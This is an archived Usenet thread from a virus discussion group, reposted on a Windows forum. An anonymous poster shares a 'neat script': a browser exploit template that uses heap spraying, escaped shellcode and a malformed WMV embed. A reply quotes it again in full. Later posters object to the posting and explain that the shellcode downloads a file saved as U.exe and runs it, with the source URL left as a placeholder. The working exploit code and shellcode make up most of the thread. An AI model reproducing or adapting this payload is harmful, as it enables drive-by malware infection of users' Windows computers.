WUGNET, the Windows User Group Network
Your Complete Resource Center for "The Best" in Shareware, Computing Tips and Support, Windows Industry News... and much more!
Home Forums Shareware Windows Tips Hot Offers FREE Newsletters Arcade Contact Us About Partners
Search WUGNET: RSS Feeds RSS Feeds Advertise with WUGNET    |    Shareware eBooks
HomeHome FAQFAQ      ProfileProfile    Private MessagesPrivate Messages   Log inLog in

neat script

 
Goto page 1, 2
   Home -> Security -> General Discussions RSS
Next:  Norton Antivirus 2009  
Author Message
George Orwell

External


Since: Nov 19, 2004
Posts: 17



(Msg. 1) Posted: Fri Sep 26, 2008 6:47 pm
Post subject: neat script
Archived from groups: alt>comp>virus (more info?)

<html>
<head>
<script>
var s=unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
do { s+=s; } while(s.length < 0x0900000);
s+=unescape("%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF<?=$ff_path;?>");
</script>
</head>
<body>
<embed src="<? for($i=0; $i < 2038;$i++) echo "-"; ?>AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLAAANNNNOOOOAAAQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ0000111122223333444455556666777788889999.wmv"></embed>
</body>
</html>

Il mittente di questo messaggio|The sender address of this
non corrisponde ad un utente |message is not related to a real
reale ma all'indirizzo fittizio|person but to a fake address of an
di un sistema anonimizzatore |anonymous system
Per maggiori informazioni |For more info
https://www.mixmaster.it
Back to top
Login to vote
David H. Lipman

External


Since: Jul 04, 2003
Posts: 3387



(Msg. 2) Posted: Fri Sep 26, 2008 6:47 pm
Post subject: Re: neat script [Login to view extended thread Info.]
Archived from groups: per prev. post (more info?)

From: "George Orwell" <nobody.TakeThisOut@mixmaster.it>

Please do NOT post scripts.

Please read the a.c.v FAQ
http://www.faqs.org/faqs/computer-virus/posting-guidelines/

--
Dave
http://www.claymania.com/removal-trojan-adware.html
Multi-AV - http://www.pctipp.ch/downloads/dl/35905.asp
Back to top
Login to vote
Russg

External


Since: Jun 03, 2006
Posts: 76



(Msg. 3) Posted: Fri Sep 26, 2008 7:41 pm
Post subject: Re: neat script [Login to view extended thread Info.]
Archived from groups: per prev. post (more info?)

I'm sure not going to try it. What does it do?


"George Orwell" <nobody.DeleteThis@mixmaster.it> wrote in message
news:cf90f71504418ea40e37a4ea336310cf@mixmaster.it...
> <html>
> <head>
> <script>
> var s=unescape("%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
> do { s+=s; } while(s.length < 0x0900000);
> s+=unescape("%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF<?=$ff_path;?>");
> </script>
> </head>
> <body>
> <embed src="<? for($i=0; $i < 2038;$i++) echo "-";
> ?>AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLAAANNNNOOOOAAAQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ0000111122223333444455556666777788889999.wmv"></embed>
> </body>
> </html>
>
> Il mittente di questo messaggio|The sender address of this
> non corrisponde ad un utente |message is not related to a real
> reale ma all'indirizzo fittizio|person but to a fake address of an
> di un sistema anonimizzatore |anonymous system
> Per maggiori informazioni |For more info
> https://www.mixmaster.it
>
Back to top
Login to vote
Ant

External


Since: Jan 31, 2004
Posts: 369



(Msg. 4) Posted: Sat Sep 27, 2008 1:36 am
Post subject: Re: neat script [Login to view extended thread Info.]
Archived from groups: per prev. post (more info?)

"Russg" wrote:
> I'm sure not going to try it. What does it do?

It's an exploit template with shellcode to download and run nasties
on your Windows computer. It won't do anything as it stands because
it's server-side code and reqires parameters.

(Aside to Dave L -- I see Dennis beat me to it!)
Back to top
Login to vote
David H. Lipman

External


Since: Jul 04, 2003
Posts: 3387



(Msg. 5) Posted: Sat Sep 27, 2008 1:36 am
Post subject: Re: neat script [Login to view extended thread Info.]
Archived from groups: per prev. post (more info?)

From: "Ant" <not DeleteThis @home.today>

| "Russg" wrote:
>> I'm sure not going to try it. What does it do?

| It's an exploit template with shellcode to download and run nasties
| on your Windows computer. It won't do anything as it stands because
| it's server-side code and reqires parameters.

| (Aside to Dave L -- I see Dennis beat me to it!)


Yeah but he posted the assembler code and only indicated it downloaded the file U.exe to
c:\ using URLDownloadToFileA() but not much else and my assembly is rusty as hell.

--
Dave
http://www.claymania.com/removal-trojan-adware.html
Multi-AV - http://www.pctipp.ch/downloads/dl/35905.asp
Back to top
Login to vote
Ant

External


Since: Jan 31, 2004
Posts: 369



(Msg. 6) Posted: Sat Sep 27, 2008 1:04 pm
Post subject: Re: neat script [Login to view extended thread Info.]
Archived from groups: per prev. post (more info?)

"David H. Lipman" wrote:

> From: "Ant" <not.DeleteThis@home.today>
> Yeah but he posted the assembler code and only indicated it downloaded the file U.exe to
> c:\ using URLDownloadToFileA() but not much else and my assembly is rusty as hell.

Well, that's all it does apart from invoking the WMV bug to enable it.
Actually, where from and what it downloads (saved as U.exe) is unknown
since the script contains only the placeholder parameter for that.

I suppose he posted the asm to show how he got there but it wasn't
necessary. I can go into some detail about the script/asm if you want
but it wont tell you much you don't already know.
Back to top
Login to vote
David H. Lipman

External


Since: Jul 04, 2003
Posts: 3387



(Msg. 7) Posted: Sat Sep 27, 2008 1:04 pm
Post subject: Re: neat script [Login to view extended thread Info.]
Archived from groups: per prev. post (more info?)

From: "Ant" <not.RemoveThis@home.today>


| I suppose he posted the asm to show how he got there but it wasn't
| necessary. I can go into some detail about the script/asm if you want
| but it wont tell you much you don't already know.

OK. Thanx.


--
Dave
http://www.claymania.com/removal-trojan-adware.html
Multi-AV - http://www.pctipp.ch/downloads/dl/35905.asp
Back to top
Login to vote
VanguardLH

External


Since: Apr 10, 2008
Posts: 49



(Msg. 8) Posted: Sat Sep 27, 2008 7:56 pm
Post subject: Re: neat script [Login to view extended thread Info.]
Archived from groups: per prev. post (more info?)

Ant wrote:

> "David H. Lipman" wrote:
>
>> From: "Ant" <not.TakeThisOut@home.today>
>> Yeah but he posted the assembler code and only indicated it downloaded the file U.exe to
>> c:\ using URLDownloadToFileA() but not much else and my assembly is rusty as hell.
>
> Well, that's all it does apart from invoking the WMV bug to enable it.
> Actually, where from and what it downloads (saved as U.exe) is unknown
> since the script contains only the placeholder parameter for that.
>
> I suppose he posted the asm to show how he got there but it wasn't
> necessary. I can go into some detail about the script/asm if you want
> but it wont tell you much you don't already know.

C'mon guys. You really expect proper netiquette from posters hiding
behind remailers, like Dizum?
Back to top
Login to vote
Display posts from previous:   
       Home -> Security -> General Discussions All times are: Eastern Time (US & Canada) (change)
Goto page 1, 2
Page 1 of 2

 
You can post new topics in this forum
You can reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
Categories:
 Windows XP
 Windows Vista
 Windows Other
 Office
 Office Other
  Security
 WinRAR
  • Home |
  • Shareware |
  • Windows Tips |
  • Hot Offers |
  • FREE Newsletters |
  • Arcade |
  • Forums |
  • eBooks |
  • About WUGNET |
  • Partners |
  • Contact

  • WUGNET Privacy Policy |
  • Link to WUGNET